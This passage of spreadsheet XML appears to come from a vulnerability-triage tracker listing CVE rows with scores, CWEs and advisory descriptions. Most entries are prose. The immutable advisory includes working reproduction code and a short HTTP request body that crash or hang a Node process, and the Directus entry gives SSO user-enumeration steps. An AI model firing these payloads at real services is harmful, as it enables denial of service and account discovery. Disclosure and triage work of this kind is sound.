        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92762</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92780</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>KnowStreaming through 3.4.1 fails to enforce role-based access control on REST API endpoints, allowing any authenticated user to access protected functionality. Attackers can call identity-management endpoints to create administrator accounts or grant themselves administrative privileges without proper authorization.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92780</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92788</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>Coze Studio through 0.5.1 fails to validate that table names in workflow SQL customization nodes belong to the caller's workspace. Authenticated attackers can enumerate predictable table identifiers and execute SQL statements against other workspaces' memory databases to read, insert, or delete data.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92788</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92796</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>Manticore Search versions 27.0.0 before 28.4.4 fail to validate permissions for all statements in multi-statement SQL requests, allowing read-only users to execute unauthorized queries. Attackers can append additional SELECT statements after the first statement to read credential tables and obtain password hashes that authenticate as administrators without plaintext recovery.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92796</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92801</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>cc-connect through 1.5.0 fails to enforce per-user allowlist filtering in the onCardAction handler for Feishu interactive card callbacks. Attackers can dispatch agent commands by triggering card actions in admitted chats, bypassing the per-user access controls that protect the text message handler.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92801</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-39896</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr">
        <is>
          <t>npm:directus</t>
        </is>
      </c>
      <c r="M252" s="5" t="inlineStr">
        <is>
          <t>10.13.0</t>
        </is>
      </c>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr"/>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">### Impact
When relying on SSO providers in combination with local authentication it can be possible to enumerate existing SSO users in the instance. This is possible because if an email address exists in Directus and belongs to a known SSO provider then it will throw a "helpful" error that the user belongs to another provider.
### Reproduction
1. Create a user using a SSO provider `test@directus.io`.
2. Try to log-in using the regular login form (or the API)
3. When using a valid email address
| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/1da3301d-226f-46a7-bfb8-3f6fb9bc55cd) | ![image](https://github.com/directus/directus/assets/9389634/50cab310-7d1c-4241-a6be-d06542565767) |
4. When using an invalid email address
| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/7b97659e-b49c-410b-872e-e36786b6e41e) | ![image](https://github.com/directus/directus/assets/9389634/d26ccba7-bb27-437e-991e-99c10941bbe7) |
5. Using this differing error it is possible to determine whether a specific email address is present in the Directus instance as an SSO user.
### Workarounds
When only using SSO for authentication then you can work around this issue by disabling local login using the following environment variable `AUTH_DISABLE_DEFAULT="true"`
### References
Implemented as feature in https://github.com/directus/directus/pull/13184
https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account
</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-39896</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40854</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router contains an authentication bypass vulnerability in the portal.cgi component. The session verification mechanism improperly validates the sessionid cookie by checking for the existence of a corresponding file in /tmp/login_user. An attacker can bypass authentication by using directory entries such as "." or ".." in the cookie, allowing unauthorized access to the administration panel.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40854</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59879</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr">
        <is>
          <t>npm:immutable</t>
        </is>
      </c>
      <c r="M254" s="5" t="inlineStr">
        <is>
          <t>3.8.4, 4.3.9, 5.1.8</t>
        </is>
      </c>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr"/>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-400, CWE-835, CWE-1284</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>## Summary
`List#set`, `List#setSize`, `List#setIn`, `List#updateIn` (and the functional `set` / `setIn` / `updateIn`) mishandle an index or size in the range `[2 ** 30, 2 ** 31)`:
- On an **empty** `List` the operation enters an **uncatchable infinite loop** (a tight CPU spin; a surrounding `try/catch` never regains control). Only killing the worker recovers it.
- On a **populated** `List` (≥ 32 elements — i.e. any array of ≥ 32 items turned into a `List` by `fromJS`) the loop allocates without bound → heap exhaustion → the **process aborts** (`SIGABRT`, exit `134`, or kernel OOM-kill `137`). A real crash, not a recoverable error.
The index may be a **numeric string**, so it can come straight from a request body, URL, or key-path. A single small unauthenticated request is enough.
There is also a companion **silent data-corruption** issue in `setSize`:
```js
List([1, 2, 3]).setSize(2 ** 31); // before fix =&gt; size 0  (silently cleared)
List([1, 2, 3]).setSize(2 ** 32 + 5); // before fix =&gt; size 5  (huge value wraps to 5)
```
## Impact
Availability only. A reachable configuration is any endpoint that routes untrusted input into a `List` index or a `setIn`/`updateIn` key-path — which the extremely common `state = fromJS(body); state.setIn(userPath, value)` pattern does (config stores, document/collection editors, redux-immutable reducers, JSON-Patch endpoints, etc.).
No confidentiality or integrity impact, no RCE. The companion `setSize` bug can silently corrupt application state (wrong size) without crashing.
## Reproduction (immutable 5.1.7)
```ts
import { fromJS, List } from 'immutable';
// 1) Populated List: OOM -&gt; process abort (SIGABRT, exit 134) within ~2s
fromJS({ items: new Array(64).fill(0) }).setIn(['items', '1073741824'], 'x');
// 2) Empty List: hangs forever, uncatchable
List().set(2 ** 30, 'x');
// 3) Silent truncation
List([1, 2, 3]).setSize(2 ** 31); // =&gt; size 0
List([1, 2, 3]).setSize(2 ** 32 + 5); // =&gt; size 5
```
A remote 43-byte HTTP request (`{"path":["items","1073741824"],"value":"x"}`) is sufficient to abort a worker that applies it via `state = state.setIn(path, value)`.
Any index in `[2 ** 30, 2 ** 31)` works (`1073741824`, `2000000000`, …). An index in `[2 ** 31, 2 ** 32)` does not crash — it silently wraps (clearing the List) via the same root cause.
## Root cause
`List` stores its values in a 32-wide trie (`SHIFT = 5`, so each level addresses 5 more bits) and uses **signed 32-bit bitwise arithmetic** throughout `setListBounds()` (`src/List.js`):
1. **Infinite loop (the hang / OOM).** The level-raising loop
```js
while (newTailOffset &gt;= 1 &lt;&lt; (newLevel + SHIFT)) {
  newRoot = new VNode(
    newRoot &amp;&amp; newRoot.array.length ? [newRoot] : [],
    owner
  );
  newLevel += SHIFT;
}
```
relies on `1 &lt;&lt; (newLevel + SHIFT)`. A JavaScript shift count is taken **mod 32**, so once `newLevel + SHIFT` reaches `31` the term goes **negative** (`1 &lt;&lt; 31 === -2147483648`) and at `32` wraps to `1` (`1 &lt;&lt; 35 === 8`). The comparison then stays `true` forever and the loop never terminates. On a populated `List`, each iteration retains a new `VNode` (`[newRoot]`), so the heap fills and V8 aborts; on an empty `List` it spins on CPU without allocating.
2. **Silent wraparound (the `setSize` corruption).** The `begin |= 0` / `end |= 0` coercion (`ToInt32`) silently wraps large finite values (`(2 ** 31) | 0 === -2147483648`, `(2 ** 32 + 5) | 0 === 5`), producing a wrong resulting size instead of an error.
The threshold is `2 ** 30`: that is the largest size for which `1 &lt;&lt; (newLevel + SHIFT)` stays a valid positive 32-bit integer throughout the loops (`newLevel + SHIFT` stays ≤ 30).
## Remediation
The fix is contained to `setListBounds()` in `src/List.js`:
1. **Validate up front, before the lossy `| 0` coercion.** Compute the intended origin and capacity in full precision and throw a clear, catchable `RangeError` when they exceed the addressable range (`MAX_LIST_SIZE = 2 ** 30`). `Infinity`/`NaN` are left to the existing `| 0 → 0` behaviour (so `setSize(Infinity)` stays `0` and `slice(0, Infinity)` still means "to the end").
2. **Stop the shift from wrapping.** Replace `1 &lt;&lt; exp` in the level-raising loops with a helper that uses the cheap bitwise shift while it is exact (`exp ≤ 30`, the common path including every `push`/`setSize`/`slice`) and falls back to the non-wrapping `2 ** exp` only for the rare deep trees reached when a negative origin (`unshift` / negative index) is normalized to a large positive capacity (`exp` can reach 35 there, where `1 &lt;&lt; 35` would wrap to 8).
This turns every hang, the misleading `"Maximum call stack size exceeded"`, the OOM/`SIGABRT`, and the silent `setSize` truncation into one descriptive `RangeError`, preserves all behaviour for sizes `&lt; 2 ** 30`, and keeps the hot `push` path on the fast bitwise shift (the `2 ** exp` branch is never reached by non-negative operations).
### Is the new limit a breaking change?
No working code is affected. A `List` could never actually hold `≥ 2 ** 30` values before — the attempt hung, crashed, or silently corrupted the size. The limit was already implicit in the 32-bit trie; the fix only makes it explicit and catchable, mirroring native JS arrays (`new Array(2 ** 32)` → `RangeError: Invalid array length`). The single observable behaviour change is that `setSize(hugeValue)`, which used to return a silently wrong size, now throws. `2 ** 30` ≈ 1.07 billion entries (~8 GB of pointers alone), far beyond any practical use.
## Mitigations (for users who cannot upgrade immediately)
- Validate/clamp any externally supplied `List` index or `setIn`/`updateIn` key-path segment against a sane maximum before passing it to immutable.
- Reject numeric path segments `≥ 2 ** 30`.
- Run request handling in a worker that can be restarted, and cap the heap (`--max-old-space-size`) so an abort is contained.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59879</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73174</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-319: Cleartext Transmission of Sensitive Information vulnerability in the edgserver management protocol of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a network-adjacent passive observer to intercept management traffic and recover sensitive device identity and network metadata in cleartext.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73174</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73464</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with gRPC Network Management Interface (gNMI) enabled, a specially crafted request could allow a malicious authenticated client with gRPC Network Management Interface (gNMI) access to execute arbitrary code with root privileges on the switch.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73464</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75516</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.34.0, AMQConnection.start() applies Math.min(maxInboundMessageBodySize, frameMax) after Connection.Tune negotiation even though AMQP defines frameMax value zero as unlimited and ConnectionFactory.DEFAULT_FRAME_MAX is zero. When the client default and server-negotiated value are both zero, the result is passed to Utils.framePayloadLimit(int), which interprets zero as Integer.MAX_VALUE and disables the configured maxInboundMessageBodySize cap. A malicious AMQP server, or a man-in-the-middle attacker able to modify Connection.Tune and inject frames into the connection, can then send an oversized frame of any frame type, causing Frame.readFrom() to allocate a large byte array before content-level validation and potentially terminate the client process through memory exhaustion. This issue is fixed in version 5.34.0.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75516</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77404</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, URI.String in uri.go concatenates CertFile, KeyFile, CACertFile, and ServerName values directly into an AMQPS query string instead of encoding them as URL query parameters with url.Values. If an application accepts a TLS asset path containing ampersand or equals delimiters and later reparses the serialized URI with ParseURI, the embedded delimiters can create or overwrite connection options, including paths to TLS certificate, key, or CA files. This can corrupt connection configuration or select unintended local cryptographic assets. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77404</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82028</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>Magistrala before 1.0.0 contains a SQL injection vulnerability in the timescale-reader and postgres-reader HTTP API services that allows authenticated attackers to inject arbitrary SQL by supplying a malicious format query parameter that is interpolated directly into the FROM clause without parameterization or identifier quoting. Attackers with a self-registered account can substitute arbitrary subqueries to achieve cross-tenant database reads, extract pg_shadow password hashes, read and write arbitrary files, and execute arbitrary code as the postgres OS user by loading attacker-supplied shared objects, with all injected SQL executing at superuser privilege due to the default PostgreSQL role configuration.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82028</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
